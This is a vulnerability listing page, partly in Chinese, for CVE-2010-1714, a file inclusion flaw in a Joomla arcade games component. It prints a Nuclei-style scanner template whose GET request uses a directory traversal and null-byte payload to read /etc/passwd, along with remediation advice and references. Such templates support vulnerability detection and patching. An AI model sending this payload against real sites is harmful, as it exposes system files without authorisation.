CVE-2010-1714: Joomla! Component Arcade Games 1.0 - Local File Inclusion

日期: 2025-08-01 | 影响软件: Joomla! Component Arcade Games | POC: 已公开

漏洞描述

A directory traversal vulnerability in the Arcade Games (com_arcadegames) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.

PoC代码[已公开]

id: CVE-2010-1714

info:
  name: Joomla! Component Arcade Games 1.0 - Local File Inclusion
  author: daffainfo
  severity: medium
  description: A directory traversal vulnerability in the Arcade Games (com_arcadegames) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
  remediation: |
    Apply the latest security patches or updates provided by the Joomla! project to fix the LFI vulnerability in the Arcade Games component.
  reference:
    - https://www.exploit-db.com/exploits/12168
    - https://nvd.nist.gov/vuln/detail/CVE-2010-1714
    - http://packetstormsecurity.org/1004-exploits/joomlaarcadegames-lfi.txt
    - http://www.vupen.com/english/advisories/2010/0860
    - https://exchange.xforce.ibmcloud.com/vulnerabilities/57683
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
    cvss-score: 5
    cve-id: CVE-2010-1714
    cwe-id: CWE-22
    epss-score: 0.06091
    epss-percentile: 0.90414
    cpe: cpe:2.3:a:dev.pucit.edu.pk:com_arcadegames:1.0:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: dev.pucit.edu.pk
    product: com_arcadegames
  tags: cve2010,cve,joomla,lfi,edb,packetstorm,dev.pucit.edu.pk

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?option=com_arcadegames&controller=../../../../../../../../../../etc/passwd%00"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a004730450220290f522330e5de7edec55a22ff1986664f816b54699b553a3fa50e9e63e21c86022100970eb97e81dd025391fe92285e22c1e4e350b52ddd2976dad1fcc68502c67c17:922c64590222798bb761d5b6d8e72950

相关漏洞推荐